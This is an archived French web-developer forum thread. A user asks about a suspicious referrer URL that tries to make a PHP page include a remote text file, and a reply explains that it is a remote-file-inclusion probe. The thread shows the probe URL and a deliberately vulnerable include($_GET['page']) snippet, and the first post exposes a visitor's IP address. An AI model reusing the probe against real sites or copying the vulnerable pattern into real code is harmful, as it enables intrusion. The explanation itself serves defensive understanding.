Intriguant : demande d'avis

lun4t1k · 10/09/2007, 22h43

En consultant les visiteurs d'un site d'un ami (compteur fait maison), j'ai vu dans le referer /index.php?page=http://www.injenn.net/edits/vulna_d.txt?&
Le fichier txt contient thisistheincludestringbyd4mn.

Ma question ne se fait pas attendre : Quézako?

ip : 217.112.41.185.

Merci.

Deimos_ · 04/11/2007, 01h58

Salut,

C'est sans aucune doute un test afin de savoir si le script php est faillible ou non. Dans ce cas classique, l'individu a tenté d'exploiter une faille include, qui se résumerait à la présence d'un code tel que celui ci-dessous dans ton fichier index.php :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
<?php

if(isset($_GET['page']))
    include($_GET['page']);

etc
?>

Si en passant son fichier en parametre il voyait sur la page chargée sa chaine "thisistheincludestringbyd4mn", ça aurait voulu dire que la page est faillible, et qu'il peut donc inclure n'importe quel script PHP, afin de pouvoir réaliser des opérations illégales.

En passant, il ne sert à rien d'inclure l'adresse IP de l'individu en question dans ton post.

Deimos

10/09/2007, 22h43	#1
lun4t1k Membre confirmé Inscription : janvier 2007 Messages : 276 Détails du profil Informations personnelles : Localisation : France, Hérault (Languedoc Roussillon) Informations forums : Inscription : janvier 2007 Messages : 276 Points : 233 Points : 233	Intriguant : demande d'avis En consultant les visiteurs d'un site d'un ami (compteur fait maison), j'ai vu dans le referer /index.php?page=http://www.injenn.net/edits/vulna_d.txt?& Le fichier txt contient thisistheincludestringbyd4mn. Ma question ne se fait pas attendre : Quézako? ip : 217.112.41.185. Merci.
	00

Outils de la discussion
Afficher une version imprimable Envoyer un lien vers cette page par email